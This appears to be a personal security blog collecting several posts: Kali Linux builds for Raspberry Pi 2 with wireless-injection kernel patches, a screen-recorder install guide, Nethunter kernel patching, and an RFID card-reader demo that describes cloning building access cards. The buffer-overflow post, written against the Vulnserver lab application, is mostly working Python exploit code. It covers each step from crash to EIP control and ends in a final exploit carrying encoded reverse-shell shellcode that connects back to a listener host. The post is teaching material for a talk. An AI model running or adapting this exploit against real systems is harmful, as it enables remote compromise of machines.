Kali Linux 1.10 on a Pi-2 Update

Hi, this is an update on Kali 1.10 following my last post. It appears Muts (@kalilinux) and the Offensive Security crew have updated their github repo: within kali-arm-build-scripts there is now a script for the Raspberry Pi-2 called rpi2.sh. The stages to build the image are as follows:-

  • git clone the Offensive Security repositories (the cross-compiler and the build scripts)
  • put the kernel config file from here in the kernel-configs directory, making sure it is called ‘rpi-3.1.8.config’
  • run ‘./rpi2.sh 1.10’
  • burn the image to your SD card

In bash, it goes something like this :-

mkdir arm-stuff
cd arm-stuff
git clone https://github.com/offensive-security/gcc-arm-linux-gnueabihf-4.7
export PATH=${PATH}:/root/arm-stuff/gcc-arm-linux-gnueabihf-4.7/bin
git clone https://github.com/offensive-security/kali-arm-build-scripts
cd kali-arm-build-scripts/kernel-configs
# fetch the raw file, not the GitHub HTML page that wraps it
wget https://raw.githubusercontent.com/yhfudev/arch-kali-rpi2/master/rpi2-3.19.config -O rpi-3.1.8.config
cd ..
./rpi2.sh 1.10
# check with lsblk that /dev/mmcblk0 really is the SD card before writing to it
dd bs=4M if=kali-image-name of=/dev/mmcblk0 conv=fsync

The good news is that the image includes the wireless injection patch for the 3.18 kernel, so we should not need to copy /lib/modules across as we had to in previous builds. The only extra task I would consider is copying a config.txt to the boot partition to assign more graphics memory for the XFCE desktop. You can get one here.

Screenshot

[Image: desktop]

In a further development, I received a comment from YunHui Fu about a script he has developed which builds not only Kali Linux but also Arch Linux for the Pi-2, with the wireless patches applied. YunHui's github repo is here and you can build it as follows:-


git clone https://github.com/yhfudev/arch-kali-rpi2.git
cd arch-kali-rpi2
./runme.sh

Update

In order to build by YunHui's method, you need to use an Ubuntu host or something similar with glibc > 2.14, otherwise the build will fail; a good choice would be Ubuntu 14.04.

You will need to make sure that you have all the dependencies sorted, so use the ‘builddeps.sh’ script from the kali-arm repository above. Note that ‘uboot-mkimage’ has been superseded by ‘u-boot-tools’, and ‘ia32-libs’ is replaced by a number of packages: lib32z1, lib32ncurses5 and lib32bz2-1.0.

I am currently running YunHui's build and will post some screenshots on here.

Regards

Cyberkryption

Simple Screen Recorder on Kali Linux

I needed a screen recorder for some upcoming video tutorials that I might put together, but found that the usual recorders such as recordmydesktop did not do the job well. After some ‘googling’, I came across Simple Screen Recorder, but there were no packages in the Debian or Kali repos. However, the developer's github page has all that you need here.

To compile it, first install the build dependencies (the i386 packages and the symlinks are only needed for the 32-bit GLInject library on a 64-bit host):-

sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install build-essential pkg-config qt4-qmake libqt4-dev libavformat-dev libavcodec-dev libavutil-dev libswscale-dev libasound2-dev libpulse-dev libjack-jackd2-dev libgl1-mesa-dev libglu1-mesa-dev libx11-dev libxfixes-dev libxext-dev libxi-dev g++-multilib libx11-6 libxext6 libxfixes3 libxfixes3:i386 libglu1-mesa:i386
cd /usr/lib/i386-linux-gnu
sudo ln -s libGL.so.1 libGL.so
sudo ln -s libGLU.so.1 libGLU.so
sudo ln -s libX11.so.6 libX11.so
sudo ln -s libXext.so.6 libXext.so
sudo ln -s libXfixes.so.3 libXfixes.so
sudo ldconfig

Now clone the developer’s repo , so that you have a local copy.

git clone https://github.com/MaartenBaert/ssr
cd ssr

If you run Kali as root (which is considered bad security practice) then you need to comment out the root check in the install script, as shown below:-

[Image: ssr]

Now simply run the install script:-

./simple-build-and-install

Enjoy

Kali-1.1.10 on a Raspberry Pi-2

I’m back and building Kali 1.1.10 for my Raspberry Pi-2 with the kernel from the latest Raspbian image at the time of writing, which is 2015-02-16-raspbian-wheezy.img. The video below shows the actual image running; apologies for the tint in the video.

The procedure is pretty much the same as per my previous post here, so if you have not read it, please read it first.

The kernel configuration was taken from the above Raspbian image and is pastebin’ed here. Simply save it in the kernel-configs directory within the kali-arm build system.

Update – 23/02/2015

I would also recommend modifying the kernel configuration as per Step 10 here, although I did not do this in my initial build.

Now go ahead and run the rpi.sh script and go and get a cup of something, as you will have to wait a while.

Now that it is built and you have burned it to your SD card, a word or two about the ‘modules’ problem.

‘Modules’ problem

On my Pi-2, the normal Raspbian image has the modules shown below loaded:

[Image: pi-modules]

Now, if you do the same on your Kali image, you will find that no modules are loaded at all. The upshot is that when you try to ‘startx’ everything will freeze. The solution is shown below:-

  1. mount the Raspbian image,
  2. delete the contents of the lib/modules directory on the Kali image that is burned to your SD card,
  3. copy the contents of lib/modules from the Raspbian image to the Kali image.

Mounting the Raspbian image is easy and is shown below:-

[Image: mount-raspbian]

Now use your favourite graphical file manager to do the rest. The catch is that during the build process the kernel was patched for wireless injection; copying Raspbian's modules over the Kali ones replaces the patched wireless modules with unpatched ones, leaving us without injection. To resolve this, we patch the sources of the kernel now running on the Pi-2, then recompile and install the kernel and its modules.

Kernel Recompilation

The procedure for recompiling the kernel goes like this

sudo apt-get install linux-source
sudo apt-get install bc gcc gcc-4.6 libc-bin libc-dev-bin libc6 libc6-dev linux-libc-dev make manpages-dev
# pick the branch that matches the running kernel (uname -r); the default branch moves on over time
git clone --depth=1 https://github.com/raspberrypi/linux
cd linux
# the running kernel's config; run 'sudo modprobe configs' first if /proc/config.gz is missing
zcat /proc/config.gz > arch/arm/configs/pi_defconfig
mkdir -p ../patches
wget https://raw.github.com/offensive-security/kali-arm-build-scripts/master/patches/kali-wifi-injection-3.12.patch -O ../patches/mac80211.patch
patch -p1 --no-backup-if-mismatch < ../patches/mac80211.patch
make pi_defconfig
# builds the kernel (arch/arm/boot/Image) as well as the modules; this takes a long time on the Pi-2
make -j4
sudo make modules_install
sudo cp /boot/kernel.img /boot/kernel-bup.img
sudo cp arch/arm/boot/Image /boot/kernel.img

So now we have wireless injection working.

 [Optional] – Raspi-Config Package

To add the raspi-config package (to overclock etc.), simply watch the video, download the deb packages and install them in the correct order.

From the command line it goes something like this, but I just downloaded them using the browser on the Pi-2.

wget http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/raspi-config_20150131-1_all.deb
wget http://http.us.debian.org/debian/pool/main/l/lua5.1/lua5.1_5.1.5-4+deb7u1_armhf.deb
wget http://http.us.debian.org/debian/pool/main/t/triggerhappy/triggerhappy_0.3.4-2_armhf.deb
dpkg -i triggerhappy_0.3.4-2_armhf.deb
dpkg -i lua5.1_5.1.5-4+deb7u1_armhf.deb
dpkg -i raspi-config_20150131-1_all.deb

Enjoy, That’s all Folks

Exploiting Buffer Overflows

Recently, at the Digital Jersey Open Source event, I gave a talk on exploiting a buffer overflow. I used Windows 7 as the host for the vulnerable Vulnserver application, which you can get from the Grey Corner blog here.

The presentation is here; some of the videos are missing, as they were only a backup in case the live demo ran into issues.


The final exploit code is shown below, with the steps used to get there shown afterwards.

Final Exploit Code

#!/usr/bin/python
import socket
server = '192.168.43.12'
port = 9999

prefix = 'A' * 2006                 # junk up to the saved return address (offset from the cyclic pattern)
eip = '\xAF\x11\x50\x62'            # 0x625011AF = JMP ESP, written little-endian
nopsled = '\x90' * 16

#msfpayload windows/shell_reverse_tcp LHOST=192.168.43.213 LPORT=443 EXITFUNC=thread R | msfencode -b '\x00' -e x86/shikata_ga_nai
exploit = (
"\xbb\x7d\x25\x14\xae\xda\xc0\xd9\x74\x24\xf4\x5e\x33\xc9" +
"\xb1\x52\x31\x5e\x12\x03\x5e\x12\x83\x93\xd9\xf6\x5b\x97" +
"\xca\x75\xa3\x67\x0b\x1a\x2d\x82\x3a\x1a\x49\xc7\x6d\xaa" +
"\x19\x85\x81\x41\x4f\x3d\x11\x27\x58\x32\x92\x82\xbe\x7d" +
"\x23\xbe\x83\x1c\xa7\xbd\xd7\xfe\x96\x0d\x2a\xff\xdf\x70" +
"\xc7\xad\x88\xff\x7a\x41\xbc\x4a\x47\xea\x8e\x5b\xcf\x0f" +
"\x46\x5d\xfe\x9e\xdc\x04\x20\x21\x30\x3d\x69\x39\x55\x78" +
"\x23\xb2\xad\xf6\xb2\x12\xfc\xf7\x19\x5b\x30\x0a\x63\x9c" +
"\xf7\xf5\x16\xd4\x0b\x8b\x20\x23\x71\x57\xa4\xb7\xd1\x1c" +
"\x1e\x13\xe3\xf1\xf9\xd0\xef\xbe\x8e\xbe\xf3\x41\x42\xb5" +
"\x08\xc9\x65\x19\x99\x89\x41\xbd\xc1\x4a\xeb\xe4\xaf\x3d" +
"\x14\xf6\x0f\xe1\xb0\x7d\xbd\xf6\xc8\xdc\xaa\x3b\xe1\xde" +
"\x2a\x54\x72\xad\x18\xfb\x28\x39\x11\x74\xf7\xbe\x56\xaf" +
"\x4f\x50\xa9\x50\xb0\x79\x6e\x04\xe0\x11\x47\x25\x6b\xe1" +
"\x68\xf0\x3c\xb1\xc6\xab\xfc\x61\xa7\x1b\x95\x6b\x28\x43" +
"\x85\x94\xe2\xec\x2c\x6f\x65\xd3\x19\x44\xa0\xbb\x5b\x9a" +
"\x4b\x87\xd5\x7c\x21\xe7\xb3\xd7\xde\x9e\x99\xa3\x7f\x5e" +
"\x34\xce\x40\xd4\xbb\x2f\x0e\x1d\xb1\x23\xe7\xed\x8c\x19" +
"\xae\xf2\x3a\x35\x2c\x60\xa1\xc5\x3b\x99\x7e\x92\x6c\x6f" +
"\x77\x76\x81\xd6\x21\x64\x58\x8e\x0a\x2c\x87\x73\x94\xad" +
"\x4a\xcf\xb2\xbd\x92\xd0\xfe\xe9\x4a\x87\xa8\x47\x2d\x71" +
"\x1b\x31\xe7\x2e\xf5\xd5\x7e\x1d\xc6\xa3\x7e\x48\xb0\x4b" +
"\xce\x25\x85\x74\xff\xa1\x01\x0d\x1d\x52\xed\xc4\xa5\x72" +
"\x0c\xcc\xd3\x1a\x89\x85\x59\x47\x2a\x70\x9d\x7e\xa9\x70" +
"\x5e\x85\xb1\xf1\x5b\xc1\x75\xea\x11\x5a\x10\x0c\x85\x5b" +
"\x31"
)
brk = '\xcc'                        # INT3 left over from the JMP ESP test (Code 5); harmless here
# keep the request at the same 3000 bytes the crash tests used
padding = 'F' * (3000 - len(prefix) - len(eip) - len(nopsled) - len(exploit) - len(brk))
attack = prefix + eip + nopsled + exploit + brk + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
print s.recv(1024)                  # banner
print "Sending Evil Buffer to TRUN "
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

 

The stages of code used to achieve remote code execution are shown below.

Code 1 – Initial Crash

#!/usr/bin/python
import socket
server = '192.168.43.12'
port = 9999

length = int(raw_input('Length of attack: '))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
print s.recv(1024)
print "Sending attack length ", length, ' to TRUN .'
attack = 'A' * length
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

Code 2 – Cyclic Pattern to locate EIP

#!/usr/bin/python
import socket
server = '192.168.43.12'
port = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
print s.recv(1024)

print "Sending Evil Buffer to TRUN ."
attack = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2C"
          "o3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9")
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

Code 3 – convert.sh, used to convert the hex bytes found in EIP back to ASCII

#!/bin/sh
# The bytes are given in memory order, i.e. the reverse of the EIP value the
# debugger shows, because x86 is little-endian: 0x38.0x43.0x6F.0x39 prints 8Co9
TESTDATA=$(echo '0x38.0x43.0x6F.0x39' | tr '.' ' ')
for c in $TESTDATA; do
    printf '%s' "${c#0x}" | xxd -r -p     # plain hex needs -p, and no 0x prefix
done
echo ""
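The pattern and offset lookup that Code 2 and Code 3 do by hand, as an added example that is not part of the original post. It generates the same Aa0Aa1... sequence as Metasploit's pattern_create.rb, converts the EIP value the debugger shows back into the four bytes that were in the buffer, and searches the pattern for them, which gives the 2006 used in the exploit. The EIP value 0x396F4338 is inferred from the 0x38.0x43.0x6F.0x39 bytes fed to convert.sh above (little-endian reading), not quoted from the post.

```python
#!/usr/bin/env python3
"""Cyclic pattern generation and EIP offset lookup in one place (added example).

The sequence is the one Metasploit's pattern_create.rb emits, so the offset
returned is the one pattern_offset.rb would give for the same pattern length."""
import string


def pattern_create(length):
    """Aa0Aa1Aa2...Az9Ba0... truncated to `length` characters."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    raise ValueError("a pattern longer than %d bytes would repeat" % (3 * len(chunks)))


def eip_bytes(eip_value):
    """The four bytes that overwrote the return address, in memory order.

    The debugger shows EIP as a 32-bit value (0x396F4338 here, inferred from
    convert.sh's input); x86 is little-endian, so the bytes in the buffer were
    38 43 6F 39, i.e. '8Co9'."""
    return eip_value.to_bytes(4, "little")


def dotted_hex_to_bytes(dotted):
    """Same conversion for the '0x38.0x43.0x6F.0x39' form convert.sh takes
    (already in memory order, so no byte swap here)."""
    return bytes(int(part, 16) for part in dotted.split("."))


def pattern_offset(needle, length=3000):
    """Offset of `needle` (bytes) in the pattern, or None if it is not there.

    Use the same length that was sent to the target; a different length can
    still contain the needle, but then the offset tells you nothing."""
    pos = pattern_create(length).encode("ascii").find(needle)
    return None if pos < 0 else pos


if __name__ == "__main__":
    print(pattern_offset(eip_bytes(0x396F4338)))                          # 2006
    print(pattern_offset(dotted_hex_to_bytes("0x38.0x43.0x6F.0x39")))      # 2006
```

The length argument matters: "8Co9" happens to be unique within 3000 bytes, but the pattern repeats after 20280 bytes, so always search the length you actually sent.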

Code 4 - Confirm EIP location in Buffer

#!/usr/bin/python
import socket
server = '192.168.43.12'
sport = 9999

prefix = 'A' * 2006
eip = 'BBBB'
padding = 'F' * (3000 - 2006 - 4)
attack = prefix + eip + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending Buffer to TRUN  "
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

Code 5 - Confirming JMP ESP

#!/usr/bin/python
import socket
server = '192.168.43.12'
port = 9999

prefix = 'A' * 2006
eip = '\xAF\x11\x50\x62'
nopsled = '\x90' * 16
brk = '\xcc'
padding = 'F' * (3000 - 2006 - 4 - 16 - 1)
attack = prefix + eip + nopsled + brk + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
print s.recv(1024)
print "Sending Evil Buffer to TRUN "
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

Code 6 - Bad Characters

#!/usr/bin/python
import socket
server = '192.168.43.12'
port = 9999
prefix = 'A' * 2006
eip = '\x42\x42\x42\x42'
nopsled = '\x90' * 16
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
brk = '\xcc'
padding = 'F' * (3000 - 2006 - 4 - 16 - len(badchars) - 1)   # keep the total at 3000 bytes
attack = prefix + eip + nopsled + badchars + brk + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
print s.recv(1024)
print "Sending Evil Buffer to TRUN "
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

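An added example (not from the original post) covering the two things Code 6 and the final exploit leave implicit: comparing the bytes sent with the bytes the debugger shows at ESP to pick out the bad characters, and assembling the final request so the shellcode is checked against those bad characters and the total stays at the 3000 bytes used in every crash test. The offset, the JMP ESP address and the 'TRUN .' framing are taken from the code above; the memory dumps in the demo are constructed, not captured from Vulnserver.

```python
#!/usr/bin/env python3
"""Bad-character triage and final request layout for the TRUN overflow (added example)."""

OFFSET = 2006           # distance to the saved return address, from the cyclic pattern
TOTAL = 3000            # request size used in every test on this page
JMP_ESP = 0x625011AF    # the JMP ESP gadget used in the final exploit


def test_chars(known_bad=b"\x00"):
    """Every byte value except the ones already known to be bad (Code 6 omits \\x00)."""
    return bytes(b for b in range(256) if b not in known_bad)


def find_bad_chars(sent, dumped):
    """Return the bytes from `sent` that did not arrive intact in `dumped`.

    A byte altered in place is bad. If the copy stopped early, the byte at
    which it stopped is bad and everything after it is unknown, so the
    comparison ends there. A byte that is dropped rather than replaced
    shifts the rest of the dump and shows up as a run of mismatches from
    that point on: remove the first one, resend, and compare again."""
    bad = []
    for i, b in enumerate(sent):
        if i >= len(dumped):
            bad.append(b)       # the copy was truncated at this byte
            break
        if dumped[i] != b:
            bad.append(b)
    return bad


def build_request(shellcode, bad=b"\x00", eip=JMP_ESP, nops=16, total=TOTAL):
    """Assemble 'TRUN .' + junk + EIP + NOP sled + shellcode + padding.

    Raises if the shellcode contains a known bad byte or does not fit in `total`."""
    hit = sorted({b for b in shellcode if b in bad})
    if hit:
        raise ValueError("shellcode contains bad chars: " + ", ".join("0x%02x" % b for b in hit))
    body = b"A" * OFFSET + eip.to_bytes(4, "little") + b"\x90" * nops + shellcode
    if len(body) > total:
        raise ValueError("payload is %d bytes, more than the %d the crash used" % (len(body), total))
    return b"TRUN ." + body + b"F" * (total - len(body)) + b"\r\n"


if __name__ == "__main__":
    sent = test_chars()
    # Constructed dump (not from a real target): \x0d replaced by \x00 in place
    print([hex(b) for b in find_bad_chars(sent, sent.replace(b"\x0d", b"\x00"))])   # ['0xd']
    # Constructed dump where the copy stopped at \x0a
    print([hex(b) for b in find_bad_chars(sent, sent[:sent.index(0x0a)])])           # ['0xa']
    req = build_request(b"\xcc" * 8)
    print(len(req), req[6 + OFFSET:6 + OFFSET + 4].hex())                            # 3008 af115062
```

In the real session the `dumped` argument is the run of bytes copied out of the debugger's memory window starting at ESP; on Vulnserver's TRUN command only \x00 turns out to be bad, which is why the final exploit's msfencode line excludes just that byte.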

That’s All Folks….!

Kali Linux on a Raspberry Pi 2

First, git clone the Kali Linux ARM repo from https://github.com/offensive-security/kali-arm-build-scripts

Now modify the architecture in the rpi.sh script to read “armhf” rather than “armel”, as the Raspberry Pi 2 has a different processor (an ARMv7 core that supports the hard-float ABI).

[Image: rpi-mod1]

Create our kernel configuration by copying the one that is pastebin’d here.

Save the file as “rpi-3.1.8.config” in the kernel config directory.

Modify the rpi.sh script to use our new kernel configuration.

[Image: rpi-mod2]

Now run the rpi.sh script; if all goes well, you should see something like the below.

[Image: kali-complete]

14/02/2015 Update

You will probably encounter a problem with the ‘startx’ command freezing the X environment with this build. If so, look at the Kali Linux forum post here.

The solution is essentially to copy the /lib/modules directory from the Raspbian image. I will look at modifying the build script to solve this in the near future.

RFID Tastic POC

Recently, whilst waiting for my RFIDler to turn up, I found the Bishop Fox site with the RFID Tastic on it here. As I don’t have the cash to spring for the HID MaxiProx 5375AGN00 reader required to build it, I decided to see if I could build it with a normal HID R10 mullion reader as a proof of concept. However, I needed 12V to power the reader, so I changed the R1 and R2 resistors to 390 ohm and 3300 ohm respectively. The R10 mullion reader supports the Wiegand protocol out of the box, so no changes were needed to accommodate it. Below is a screenshot of it working on the bench, reading a card and storing the card data on the SD card.

[Image: cloner-scaled]

After that it was installed in a protective case, as shown, in preparation for the Jersey Tech Fair. The unit was demoed reading Mifare access cards, Jersey bus pre-payment cards and NFC-enabled bank cards in order to raise awareness.

[Image: cloner2-scaled]

As you can get programmable UID0 cards on eBay for as little as $2, it is easy to imagine the type of access that could be obtained when coupled with the high-powered HID MaxiProx 5375AGN00 reader, which would enable reading of cards at a distance. For example, a building's access control cards could be read by just walking past employees as they enter; this data could then be reprogrammed onto a UID0 card, potentially allowing unauthorised personnel access to the building.

 

The Quest for Kali Nethunter – Part 3

In this third post, we shall look at patching the kernel sources for cm-11.

The kernel sources are located at /root/android/system/kernel/<vendor>/<device>, which in my case is /root/android/system/kernel/htc/endeavoru.

Next, change to the root of the kernel source tree and get the patches from the following:

wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch

Now, we patch it.

[Image: patch1-kernel]

Now we download the kernel patch from pelya repository at https://github.com/pelya/android-keyboard-gadget/blob/master/kernel-3.1.patch

Next we patch it as shown below:-

[Image: patch2-kernel]

As we can see, the patching worked apart from android.c in drivers/usb/gadget. On looking at the code, it became clear that it could be patched manually in android.c at line 1704, as shown below:-

[Image: patch3-kernel]

Now that we have patched the kernel, we need to apply the ueventd.rc patch in /root/android/system/system/core/rootdir, as shown below:-

[Image: patch-uevent]

Now head to android/system and type ‘make clean’ to clean the build system, then rebuild the ROM as per the previous posts.
